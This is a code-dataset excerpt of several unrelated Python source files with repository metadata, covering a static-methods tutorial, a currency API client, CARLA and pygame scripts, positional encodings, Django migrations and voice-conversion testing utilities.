def apply_raise(self):
self.pay = int(self.pay * self.raise_amount)
@classmethod
def set_raise_amount(cls, amount):
cls.raise_amount = amount
@classmethod
def from_string(cls, emp_str):
first, last, pay = emp_str.split('-')
return cls(first, last, pay)
"""Regular methods pass the instance, 'self', as the first argument. Class methods pass
the class, 'cls', as the first argument. Static methods do not pass anything
automatically. They behave like regular functions but add logical connection to the class."""
"""Static methods have a limited use case, as they cannot access the properties
of classes themselves. They are used if you need a utility function that
doesn't access class properties but still needs to belong to the class."""
"""If the instance or class is not used anywhere within a function, it
is a static method. Therefore, you should use a static method if the code
is not dependant on instance creation and does not use any instance variable."""
"""Create a function that takes a date and checks if it is a workday.
In Python, days have indexes 0-6 for Mon-Sun."""
@staticmethod
def is_workday(day):
if day.weekday() == 5 or day.weekday() == 6: #checks if weekend
return False
else:
return True
emp_1 = Employee("Corey", "Schafer", 50000)
emp_2 = Employee("Test", "User", 60000)
import datetime
my_date = datetime.date(2016, 7, 10) #prints false as it is a Sunday
print(Employee.is_workday(my_date))
| latiful-hassan/OOP | staticmethods.py | staticmethods.py | py | 1,980 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date",
"line_number": 57,
"usage_type": "call"
}
] |
34619647140 | import datetime
import json
import random
import requests
import numpy as np
import pandas as pd
from pkg_resources import resource_filename
class DataWrangler:
def __init__(self, wallet, start, end):
self.wallet = wallet
self.start = start
self.end = end
self.profit = None
self.summary = None
self.dataviz_data = None
def get_summary(self):
df = pd.DataFrame(self.wallet)
df = df[df['effectiveDate'] == self.end].copy(deep=True)
df['final_pct_of_total'] = round(
(df['outcome'] / sum(df['outcome'])) * 100, 2)
df.drop(columns=['no', 'mid', 'effectiveDate'], inplace=True)
df.set_index('currency', inplace=True)
self.profit = round(sum(df['profit']), 2)
self.summary = df
def get_dataviz_data(self):
df = pd.DataFrame(self.wallet)
df.rename(columns={'effectiveDate': 'date'}, inplace=True)
df = df.pivot(index='currency', columns='date', values='pct_change')
self.dataviz_data = df
class RandomCurrencies:
def __init__(self, num):
self.num = num
self._codes = set(load_currencies().keys())
@property
def num(self):
return self._num
@num.setter
def num(self, value):
if not 0 < value <= 35:
raise ValueError('Number of currencies must be between 1 and 35')
self._num = value
def _country_codes(self):
"""Generate random country codes"""
return random.sample(self._codes, self.num)
def _pct_values(self):
"""Generate random pct values that add up to 100"""
nums = np.random.random(self.num)
nums = [round(n / sum(nums) * 100) for n in nums]
if 0 in nums or sum(nums) != 100:
return self._pct_values()
return nums
def generate(self):
"""Return currency & percent value pairs (max 35)"""
return [(code, pct_value) for code, pct_value
in zip(self._country_codes(), self._pct_values())]
def first_possible_date():
date = datetime.date.today() - datetime.timedelta(days=29)
return date.strftime('%Y-%m-%d')
def load_currencies():
path = resource_filename('currency_wallet.utils', 'data/currencies.json')
with open(path, 'r') as file:
currencies = json.load(file)
return {c['code']: c['currency'] for c in currencies[0]['rates']}
def query_nbp_api(currency, start, end):
"""Get exchange rates from NBP api"""
adapter = requests.adapters.HTTPAdapter(max_retries=2)
session = requests.Session()
session.mount('http://api.nbp.pl/', adapter)
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)\
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
url = f'http://api.nbp.pl/api/exchangerates/rates/a/{currency}/{start}/{end}/?format=json'
try:
response = session.get(url, headers=headers, timeout=3)
response.raise_for_status()
result = response.json()
except Exception as e:
print(e)
return result
| karolow/currency-wallet | currency_wallet/utils/utils.py | utils.py | py | 3,114 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.random.random",... |
39723292841 | #Find list of all sub_breed breed name
import requests
def get_json_dog_output_dict(url):
r = requests.get(url)
output = r.json()
return output
def get_breed_sub_breed_full_name():
dog_output = get_json_dog_output_dict(url = "https://dog.ceo/api/breeds/list/all")
dog_breed_output = dog_output["message"]
dog_full_name = dog_breed_output.items()
for breed, sub_breeds in dog_full_name:
# print(f"breed:{breed}; type:{sub_breed}")
# print(f"{sub_breed} {breed}")
if sub_breeds:
for sub_breed in sub_breeds:
print(f"{sub_breed}-{breed}")
else:
print(f"{breed}")
if __name__ == "__main__":
output = get_json_dog_output_dict(url = "https://dog.ceo/api/breeds/list/all")
dog_keys_fullname = get_breed_sub_breed_full_name()
#print(dog_keys_fullname)
| Swetha-Vootkuri/PythonSessions | dogs_api/breed_sub_breed_list.py | breed_sub_breed_list.py | py | 859 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 5,
"usage_type": "call"
}
] |
21185857238 | import pygame
from time import time
import os
## OPTIONS LIEES A L'AFFICHAGE
screen_width, screen_height = 1280, 720 # taille de la fenetre
show_interface = False # afficher le classement
ticks_per_second = 60 # nombre de mise à jour par seconde
empty_ground_color = (210, 210, 210) # couleur d'une terre inoccupée
background_color = (73, 200, 255) # couleur du vide
port_color = (13, 143, 185)
map_height = 650 # taille de la carte en pixel
## PRECHARGEMENTS
pygame.font.init()
font = pygame.font.Font("img/Proxima Nova Font.otf", 30)
small_font = pygame.font.Font("img/Proxima Nova Font.otf", 20)
flag_img = pygame.image.load("img/flag.png")
disabled_flag_img = pygame.image.load("img/disabled_flag.png")
folder_name = "result/" + str(int(time())) + "/"
os.mkdir(folder_name)
## OPTIONS LIEES AUX MONTAGES VIDEOS
record_games = True # enregistrement des vidéos
edit_when_finished = True # faire le montage une fois la vidéo terminée
min_x, max_x, min_y, max_y = 99999, -1, 99999, -1
framerate = 30 # nombre d'image par seconde
duration = 60 # durée de la partie, en secondes
result_duration = 5 # durée d'affichage du gagnant, en secondes
width, height = 1080, 1920 # taille de la vidéo
source_width, source_height = 1280, 720 # taille des images d'origine
top_text = "Bataille de terrain" # texte affiché en haut de la vidéo
bottom_text = ["Abonnez vous et", "commentez votre", "département pour", "recevoir un boost !"] # text affiché au bas de la vidéo | JonathanOll/Pixel-War-Simulator | options.py | options.py | py | 1,495 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "pygame.font.init",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pygame.font",
... |
27029688469 | import torch
import numpy as np
import torch.nn as nn
class PositionalEncoding1D(nn.Module):
def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
"""
:param channels: The last dimension of the tensor you want to apply pos emb to.
"""
super().__init__()
self.channels = num_pos_feats
dim_t = torch.arange(0, self.channels, 2).float()
if scale is not None and normalize is False:
raise ValueError("normalize should be True if scale is passed")
if scale is None:
scale = 2 * np.pi
self.scale = scale
self.normalize = normalize
inv_freq = 1. / (temperature ** (dim_t / self.channels))
self.register_buffer('inv_freq', inv_freq)
def forward(self, tensor):
"""
:param tensor: A 2d tensor of size (len, c)
:return: Positional Encoding Matrix of size (len, c)
"""
if tensor.ndim != 2:
raise RuntimeError("The input tensor has to be 2D!")
x, orig_ch = tensor.shape
pos_x = torch.arange(
1, x + 1, device=tensor.device).type(self.inv_freq.type())
if self.normalize:
eps = 1e-6
pos_x = pos_x / (pos_x[-1:] + eps) * self.scale
sin_inp_x = torch.einsum("i,j->ij", pos_x, self.inv_freq)
emb_x = torch.cat((sin_inp_x.sin(), sin_inp_x.cos()), dim=-1)
emb = torch.zeros((x, self.channels),
device=tensor.device).type(tensor.type())
emb[:, :self.channels] = emb_x
return emb[:, :orig_ch]
class PositionalEncoding2D(nn.Module):
"""
This is a more standard version of the position embedding, very similar to the one
used by the Attention is all you need paper, generalized to work on images.
"""
def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
super().__init__()
self.num_pos_feats = num_pos_feats
self.temperature = temperature
self.normalize = normalize
if scale is not None and normalize is False:
raise ValueError("normalize should be True if scale is passed")
if scale is None:
scale = 2 * np.pi
self.scale = scale
def forward(self, tensors):
x = tensors.tensors
mask = tensors.mask
assert mask is not None
not_mask = ~mask
y_embed = not_mask.cumsum(1, dtype=torch.float32)
x_embed = not_mask.cumsum(2, dtype=torch.float32)
if self.normalize:
eps = 1e-6
y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale
x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale
dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device)
dim_t = self.temperature ** (2 * torch.div(dim_t, 2, rounding_mode='trunc') / self.num_pos_feats)
pos_x = x_embed[:, :, :, None] / dim_t
pos_y = y_embed[:, :, :, None] / dim_t
pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
return pos
| ViTAE-Transformer/DeepSolo | adet/layers/pos_encoding.py | pos_encoding.py | py | 3,339 | python | en | code | 177 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.arange",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number"... |
35147097028 | import nltk
from functools import lru_cache
from nltk.corpus import stopwords
from nltk.stem.snowball import EnglishStemmer
import re
from bs4 import BeautifulSoup
class Preprocessor:
def __init__(self):
# Stemming is the most time-consuming part of the indexing process, we attach a lru_cache to the stemmer
# which will store upto 100000 stemmed forms and reuse them when possible instead of applying the
# stemming algorithm.
self.stem = lru_cache(maxsize=100000)(EnglishStemmer().stem)
self.tokenize = nltk.tokenize.WhitespaceTokenizer().tokenize
def __call__(self, text):
text = re.sub(r'[\.\?\!\,\:\;\"]', ' ', text)
# text = re.sub('[-]', ' ', text)
text = re.sub(r'<.?p>', '', text)
# text = BeautifulSoup(text, "lxml").text
tokens = nltk.tokenize.word_tokenize(text)
tokens = [token.lower() for token in tokens if
token.isalpha()] # removing punctuations from tokens and converting to lower case
stop_words = stopwords.words('english')
tokens = [token for token in tokens if not token in stop_words]
tokens = [self.stem(token) for token in tokens]
return tokens
| sidsachan/movie_sentiment | preprocessor.py | preprocessor.py | py | 1,221 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "functools.lru_cache",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "nltk.stem.snowball.EnglishStemmer",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "nltk.tokenize.WhitespaceTokenizer",
"line_number": 15,
"usage_type": "call"
},
... |
15760194327 | import glob
import os
import sys
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import random
import time
import numpy as np
import cv2
IM_WIDTH = 640
IM_HEIGHT = 480
def process_img(image, name):
print("Frame: "+str(image.frame)+", timestamp: "+str(image.timestamp))
i = np.array(image.raw_data)
i2 = i.reshape((IM_HEIGHT, IM_WIDTH, 4))
i3 = i2[:, :, :3]
cv2.imshow(name, i3)
cv2.waitKey(1)
if image.frame % 20 == 0:
image.save_to_disk('_out/%06d.png' % image.frame)
return i3/255.0
actor_list = []
try:
# 0. Set the cilent and the world
client = carla.Client('localhost', 2000) # https://carla.readthedocs.io/en/latest/core_world/#client-creation
client.set_timeout(10)
world = client.get_world()
# 1. Choose blueprint for the vehicle
blueprint_library = world.get_blueprint_library() # https://carla.readthedocs.io/en/latest/core_actors/#blueprints
vehicle = blueprint_library.find('vehicle.tesla.model3') # vehicle_bp = blueprint_library.filter('model3')[0]
vehicle.set_attribute('color', '255,0,0')
print(vehicle)
# 2. Choose spawn point
# manually
# spawn_point = carla.Transform(carla.Location(x=, y=, z=),
# carla.Rotation(pitch=, yaw=, roll=))
# automatically
spawn_point_vehicle = random.choice(world.get_map().get_spawn_points())
print(spawn_point_vehicle)
# 3. Spawn the vehicles
# spawn the actor
actor_vehicle = world.spawn_actor(vehicle, spawn_point_vehicle)
# set control mode. https://carla.readthedocs.io/en/latest/python_api/#carla.Vehicle
# vehicle.apply_control(carla.VehicleControl(throttle=0.1, steer=0.0))
actor_vehicle.set_autopilot(True) # if you just wanted some NPCs to drive.
# append to the actor_list
actor_list.append(actor_vehicle)
# 4. Get the blueprint for this sensor: https://carla.readthedocs.io/en/latest/core_sensors/
sensor = blueprint_library.find('sensor.camera.rgb')
# Change the dimensions of the image
sensor.set_attribute('image_size_x', f'{IM_WIDTH}')
sensor.set_attribute('image_size_y', f'{IM_HEIGHT}')
sensor.set_attribute('fov', '110')
# 5. Adjust sensor relative to vehicle
# choose the relative spawn point
spawn_point_sensor = carla.Transform(carla.Location(x=2.5, z=1.0), carla.Rotation(pitch=-15))
print(spawn_point_sensor)
# spawn the sensor and attach to vehicle.
actor_sensor = world.spawn_actor(sensor, spawn_point_sensor, attach_to=actor_vehicle)
# add sensor to list of actors
actor_list.append(actor_sensor)
# 6. Process the collected images: https://carla.readthedocs.io/en/latest/core_sensors/#listening
# Use the data collected by the sensor. The lambda function can be customized
actor_sensor.listen(lambda data: process_img(data, "camera1"))
# actor_sensor.listen(lambda image: image.save_to_disk('output/%06d.png' % image.frame))
finally:
print('destroying actors')
for actor in actor_list:
actor.destroy()
print('done.') | hchoi256/carla-research-project | Learning_Tasks/LT1/vehicle_camera.py | vehicle_camera.py | py | 3,348 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "glob.glob",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.version_info",
"line_num... |
41230462018 | import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
from SnapOptimizer.optimization.snap_optimizer import SNAPGateOptimizer2Qubits, SNAPGateOptimizerStatePreparation
from SnapOptimizer.optimization.snap_pulse_optimizer import SNAPPulseOptimizer
import SnapOptimizer.qubit_gates as qubit_gates
from SnapOptimizer.visualize import show_state
from SnapOptimizer.encodings import Encoding
import SnapOptimizer.paths as local_paths
def optimize_SNAP_gates(
encoding: Encoding, gates: list[str], n_gates: list[int], Ns: list[int], epochs: int, output_folder: Path,
show_figure: bool = False, c: float = 0.001, averages: int = 1
):
"""
Automation for the optimization of SNAP gates
Args:
encoding: The encoding to use
gates: The gates to optimize
n_gates: How many SNAP gates to use to replicate the gate
Ns: Size of the Hilbert space in the fock basis
epochs: How many epochs to run the optimization for
output_folder: folder to save the results to
show_figure: If True the figures will pop up on screen when they are drawn. Otherwise they will only be saved
c: Parameter to control the weight of the thetas in the optimization
averages: Run the same optimization multiple times
"""
fidelity_fig, fidelity_ax = plt.subplots(1, figsize=(8, 8))
for N in Ns:
code = encoding.get_encoding(N)
snap_op = SNAPGateOptimizer2Qubits(code, c=c)
for gate_name in gates:
gate = getattr(qubit_gates, gate_name.upper(), None)
if gate is None:
print(f"The gate {gate_name} is not defined. Check your spelling and try again")
continue
for n in n_gates:
for i in range(averages):
if averages == 1:
save_to = output_folder / f"{gate_name}-{n}-gates-{N}-fockstates"
else:
save_to = output_folder / f"{gate_name}-{n}-gates-{N}-fockstates_{i+1}"
alphas, thetas, _, fidelities = snap_op.optimize_gates(gate, n, epochs, output_folder=save_to)
# Generate figures
fidelity_ax.plot(range(epochs), fidelities, label=f"{gate_name} {n} gates {N} fock")
fig, axs = plt.subplots(2, 4, figsize=(16, 8))
for i, qubit_state in enumerate(['L00', 'L01', 'L10', 'L11']):
logic_state = getattr(snap_op, qubit_state)
evolved_state = snap_op.snap_gate(alphas, thetas, logic_state)
expected_state = snap_op.transform_gate(gate) @ logic_state
show_state(evolved_state, ax=axs[0][i], title=f"Gate on {qubit_state}")
show_state(expected_state, ax=axs[1][i], title="")
fig.savefig(save_to / 'wigner_plots.png', dpi=150)
if show_figure:
plt.show()
plt.close(fig)
# Figure over the fidelities
fidelity_ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
fidelity_fig.tight_layout()
fidelity_ax.set_ylabel("Fidelity")
fidelity_ax.set_xlabel("Epoch")
fidelity_ax.set_ylim([0, 1.1])
filename = output_folder / 'fidelity_plot.png'
# Handle the possibility of the image already existing. (Multiple processes running the optimization)
counter = 1
while filename.exists():
filename = output_folder / f'fidelity_plot_{counter}.png'
counter += 1
fidelity_fig.savefig(filename, dpi=150)
if show_figure:
plt.show()
def optimize_SNAP_gates_for_state_preparation(state: np.ndarray, n: int, N: int, epochs: int = 2000, output_folder: Path = None):
op = SNAPGateOptimizerStatePreparation(N=N)
ground_state = np.zeros((N, 1))
ground_state[0, 0] = 1
alphas, thetas, cost, fidelities = op.optimize_gates(state, n_gates=n, epochs=epochs, output_folder=output_folder)
_, (ax1, ax2) = plt.subplots(1, 2)
fig, ax = plt.subplots(1)
evolved_state = op.snap_gate(alphas, thetas, ground_state)
show_state(evolved_state, ax=ax1, title=f"Evolved ground state")
show_state(state, ax=ax2, title="Target state")
ax.plot(range(len(fidelities)), fidelities)
plt.show()
def optimize_SNAP_pulses(alphas: np.ndarray, thetas: np.ndarray, output_folder: Path = None):
op = SNAPPulseOptimizer(
dim_c = thetas.shape[-1],
dim_t = 2,
delta = -2.574749e6,
xi = -2*np.pi* 2.217306e6,
xip = -2*np.pi* 0.013763e6,
K = -2*np.pi* 0.002692e6,
alpha = 0,
wt = 0,
wc = 0,
max_rabi_rate = 2*np.pi* 20e6,
cutoff_frequency = 2*np.pi* 30e6,
num_drives = 1
)
op.optimize_gate_pulses(thetas, alphas, 0.7e-6, output_folder=output_folder)
if __name__ == '__main__':
# input_folder = local_paths.data('test_state_20')
# output_folder = local_paths.pulses('test_state_20')
# thetas = np.loadtxt(input_folder / 'thetas.csv', delimiter=',')
# alphas = np.loadtxt(input_folder / 'alphas.csv', delimiter=',')
# optimize_SNAP_pulses(alphas=alphas, thetas=thetas)
output_folder = local_paths.data('fock_1')
N = 12
n = 1
epochs = 3000
fock1 = np.zeros((12, 1))
fock1[1,:] = 1
print(fock1)
optimize_SNAP_gates_for_state_preparation(fock1, n, N, epochs=epochs, output_folder=output_folder)
| Paulsson99/SnapOptimizer | SnapOptimizer/optimization/automation.py | automation.py | py | 5,537 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "SnapOptimizer.encodings.Encoding",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 31,
"usage_type": "call"
},
{
"api_name... |
28508158291 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0019_auto_20150312_1008'),
]
operations = [
migrations.CreateModel(
name='LinkCategory',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),
('name', models.CharField(max_length=200)),
('description', models.TextField(default=None, blank=True, null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='WebLink',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),
('name', models.CharField(max_length=200)),
('url', models.URLField()),
('category', models.ForeignKey(to='home.LinkCategory')),
],
options={
},
bases=(models.Model,),
),
]
| micahlagrange/rmlsa.com | rmlsa/home/migrations/0020_linkcategory_weblink.py | 0020_linkcategory_weblink.py | py | 1,164 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.CreateModel",
"line_number": 14,
"usage_type": "call"
},
... |
35478284383 | import os
import glob
import h5py
import json
import copy
import torch
import librosa
import numpy as np
import soundfile as sf
import speech_recognition as sr
from jiwer import wer
from tqdm import tqdm
from scipy import signal
from trainer import Trainer
from hps.hps import hp, Hps
from torch.autograd import Variable
from preprocess import get_spectrograms
from model.tacotron.text.symbols import symbols
############
# CONSTANT #
############
MIN_LEN = 9
def griffin_lim(spectrogram): # Applies Griffin-Lim's raw.
def _invert_spectrogram(spectrogram): # spectrogram: [f, t]
return librosa.istft(spectrogram, hp.hop_length, win_length=hp.win_length, window="hann")
X_best = copy.deepcopy(spectrogram)
for i in range(hp.n_iter):
X_t = _invert_spectrogram(X_best)
est = librosa.stft(X_t, hp.n_fft, hp.hop_length, win_length=hp.win_length)
phase = est / np.maximum(1e-8, np.abs(est))
X_best = spectrogram * phase
X_t = _invert_spectrogram(X_best)
y = np.real(X_t)
return y
def spectrogram2wav(mag): # Generate wave file from spectrogram
mag = mag.T # transpose
mag = (np.clip(mag, 0, 1) * hp.max_db) - hp.max_db + hp.ref_db # de-noramlize
mag = np.power(10.0, mag * 0.05) # to amplitude
wav = griffin_lim(mag) # wav reconstruction
wav = signal.lfilter([1], [1, -hp.preemphasis], wav) # de-preemphasis
wav, _ = librosa.effects.trim(wav) # trim
return wav.astype(np.float32)
def synthesis(f0, sp, ap, sr=16000):
y = pw.synthesize(f0.astype(np.float64), sp.astype(np.float64), ap.astype(np.float64), sr, pw.default_frame_period)
return y
def convert_x(x, c, trainer, enc_only, verbose=False):
c_var = Variable(torch.from_numpy(np.array([c]))).cuda()
tensor = torch.from_numpy(np.expand_dims(x, axis=0)).type(torch.FloatTensor)
converted, enc = trainer.test_step(tensor, c_var, enc_only=enc_only, verbose=verbose)
converted = converted.squeeze(axis=0).transpose((1, 0))
enc = enc.squeeze(axis=0).transpose((1, 0))
return converted, enc
def encode_x(x, trainer):
tensor = torch.from_numpy(np.expand_dims(x, axis=0)).type(torch.FloatTensor)
enc = trainer.encoder_test_step(tensor)
enc = enc.squeeze(axis=0).transpose((1, 0))
return enc
def get_trainer(hps_path, model_path, g_mode, enc_mode, clf_path):
HPS = Hps(hps_path)
hps = HPS.get_tuple()
global MIN_LEN
MIN_LEN = MIN_LEN if hps.enc_mode != 'gumbel_t' else hps.seg_len
trainer = Trainer(hps, None, g_mode, enc_mode)
trainer.load_model(model_path, load_model_list=hps.load_model_list, clf_path = clf_path)
return trainer
def asr(fname):
r = sr.Recognizer()
with sr.WavFile(fname) as source:
audio = r.listen(source)
text = r.recognize_google(audio, language='en')
return text
def compare_asr(s_wav, t_wav):
try:
gt = asr(s_wav)
recog = asr(t_wav)
err_result = wer(gt, recog), wer(' '.join([c for c in gt if c != ' ']), ' '.join([c for c in recog if c != ' ']))
except sr.UnknownValueError:
err_result = [1., 1.]
except:
err_result = [-1., -1.]
return err_result
def parse_encodings(encodings):
return [' '.join([str(int(e)) for i, e in enumerate(enc)]) for enc in encodings]
def write_encodings(path, encodings):
with open(path, 'w') as file:
for enc in encodings:
for i, e in enumerate(enc):
file.write(str(int(e)) + (' ' if i < len(enc)-1 else ''))
file.write('\n')
def convert(trainer,
seg_len,
src_speaker_spec,
src_speaker,
tar_speaker,
utt_id,
speaker2id,
result_dir,
enc_only=True,
save=['wav', 'enc']):
# pad spec to minimum len
PADDED = False
if len(src_speaker_spec) < MIN_LEN:
padding = np.zeros((MIN_LEN - src_speaker_spec.shape[0], src_speaker_spec.shape[1]))
src_speaker_spec = np.concatenate((src_speaker_spec, padding), axis=0)
PADDED = True
if len(src_speaker_spec) <= seg_len:
converted_results, encodings = convert_x(src_speaker_spec, speaker2id[tar_speaker], trainer, enc_only=enc_only)
if PADDED:
encodings = encodings[:MIN_LEN//8] # truncate the encoding of zero paddings
else:
converted_results = []
encodings = []
for idx in range(0, len(src_speaker_spec), seg_len):
if idx + (seg_len*2) > len(src_speaker_spec):
spec_frag = src_speaker_spec[idx:-1]
else:
spec_frag = src_speaker_spec[idx:idx+seg_len]
if len(spec_frag) >= seg_len:
converted_x, enc = convert_x(spec_frag, speaker2id[tar_speaker], trainer, enc_only=enc_only)
converted_results.append(converted_x)
encodings.append(enc)
elif idx == 0:
raise RuntimeError('Please check if input is too short!')
converted_results = np.concatenate(converted_results, axis=0)
encodings = np.concatenate(encodings, axis=0)
wav_data = spectrogram2wav(converted_results)
if len(save) != 0:
if 'wav' in save:
wav_path = os.path.join(result_dir, f'{tar_speaker}_{utt_id}.wav')
sf.write(wav_path, wav_data, hp.sr, 'PCM_16')
if 'enc' in save:
enc_path = os.path.join(result_dir, f'{src_speaker}_{utt_id}.txt')
write_encodings(enc_path, encodings)
return wav_path, len(converted_results)
else:
return wav_data, encodings
def encode(src_speaker_spec, trainer, seg_len, s_speaker=None, utt_id=None, result_dir=None, save=True):
if save:
assert result_dir != None
assert s_speaker != None
assert utt_id != None
# pad spec to minimum len
PADDED = False
if len(src_speaker_spec) < MIN_LEN:
padding = np.zeros((MIN_LEN - src_speaker_spec.shape[0], src_speaker_spec.shape[1]))
src_speaker_spec = np.concatenate((src_speaker_spec, padding), axis=0)
PADDED = True
if len(src_speaker_spec) <= seg_len:
encodings = encode_x(src_speaker_spec, trainer)
if PADDED:
encodings = encodings[:MIN_LEN//8] # truncate the encoding of zero paddings
else:
encodings = []
for idx in range(0, len(src_speaker_spec), seg_len):
if idx + (seg_len*2) > len(src_speaker_spec):
spec_frag = src_speaker_spec[idx:-1]
else:
spec_frag = src_speaker_spec[idx:idx+seg_len]
if len(spec_frag) >= seg_len:
enc = encode_x(spec_frag, trainer)
encodings.append(enc)
elif idx == 0:
raise RuntimeError('Please check if input is too short!')
encodings = np.concatenate(encodings, axis=0)
if save:
enc_path = os.path.join(result_dir, f"{s_speaker}_{utt_id}.txt")
write_encodings(enc_path, encodings)
else:
return encodings
def test_from_list(trainer, seg_len, synthesis_list, data_path, speaker2id_path, result_dir, enc_only, flag='test', run_asr=False):
with open(speaker2id_path, 'r') as f_json:
speaker2id = json.load(f_json)
feeds = []
with open(synthesis_list, 'r') as f:
file = f.readlines()
for line in file:
line = line.split('\n')[0].split(' ')
feeds.append({'s_id' : line[0].split('/')[1].split('_')[0],
'utt_id' : line[0].split('/')[1].split('_')[1],
't_id' : line[1], })
print('[Tester] - Number of files to be resynthesize: ', len(feeds))
dir_path = os.path.join(result_dir, f'{flag}/')
os.makedirs(dir_path, exist_ok=True)
err_results = []
with h5py.File(data_path, 'r') as f_h5:
for feed in tqdm(feeds):
conv_audio, n_frames = convert(trainer,
seg_len,
src_speaker_spec=f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()],
src_speaker=feed['s_id'],
tar_speaker=feed['t_id'],
utt_id=feed['utt_id'],
speaker2id=speaker2id,
result_dir=dir_path,
enc_only=enc_only,
save=['wav'])
n_frames = len(f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()])
if run_asr:
if hp.frame_shift * (n_frames - 1) + hp.frame_length >= 3.0:
orig_audio = spectrogram2wav(f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()])
sf.write('orig_audio.wav', orig_audio, hp.sr, 'PCM_16')
err_results.append(compare_asr(s_wav='orig_audio.wav', t_wav=conv_audio))
os.remove(path='orig_audio.wav')
if run_asr:
err_mean = np.mean(err_results, axis=0)
print('WERR: {:.3f} CERR: {:.3f}, computed over {} samples'.format(err_mean[0], err_mean[1], len(err_results)))
def cross_test(trainer, seg_len, data_path, speaker2id_path, result_dir, enc_only, flag):
with h5py.File(data_path, 'r') as f_h5:
with open(speaker2id_path, 'r') as f_json:
speaker2id = json.load(f_json)
if flag == 'test':
source_speakers = sorted(list(f_h5['test'].keys()))
elif flag == 'train':
source_speakers = [s for s in sorted(list(f_h5['train'].keys())) if s[0] == 'S']
target_speakers = [s for s in sorted(list(f_h5['train'].keys())) if s[0] == 'V']
print('[Tester] - Testing on the {}ing set...'.format(flag))
print('[Tester] - Source speakers: %i, Target speakers: %i' % (len(source_speakers), len(target_speakers)))
print('[Tester] - Converting all testing utterances from source speakers to target speakers, this may take a while...')
for src_speaker in tqdm(source_speakers):
for tar_speaker in target_speakers:
assert src_speaker != tar_speaker
dir_path = os.path.join(result_dir, f'{src_speaker}_to_{tar_speaker}')
os.makedirs(dir_path, exist_ok=True)
for utt_id in f_h5[f'test/{src_speaker}']:
src_speaker_spec = f_h5[f'test/{src_speaker}/{utt_id}/lin'][()]
convert(trainer,
seg_len,
src_speaker_spec,
tar_speaker,
utt_id=utt_id,
speaker2id=speaker2id,
result_dir=dir_path,
enc_only=enc_only)
def test_single(trainer, seg_len, speaker2id_path, result_dir, enc_only, s_speaker, t_speaker):
with open(speaker2id_path, 'r') as f_json:
speaker2id = json.load(f_json)
if s_speaker == 'S015':
filename = './data/english/train/unit/S015_0361841101.wav'
elif s_speaker == 'S119':
filename = './data/english/train/unit/S119_1561145062.wav'
elif s_speaker == 'S130':
filename = './data/english/test/S130_3516588097.wav'
elif s_speaker == 'S089':
filename = './data/english/test/S089_1810826781.wav'
elif s_speaker == 'S378':
filename = './data/surprise/test/S378_117437.wav'
else:
raise NotImplementedError('Please modify path manually!')
_, spec = get_spectrograms(filename)
wav_data, encodings = convert(trainer,
seg_len,
src_speaker_spec=spec,
src_speaker=s_speaker,
tar_speaker=t_speaker,
utt_id='',
speaker2id=speaker2id,
result_dir=result_dir,
enc_only=enc_only,
save=[])
sf.write(os.path.join(result_dir, 'result.wav'), wav_data, hp.sr, 'PCM_16')
write_encodings(os.path.join(result_dir, 'result.txt'), encodings)
err_result = compare_asr(filename, os.path.join(result_dir, 'result.wav'))
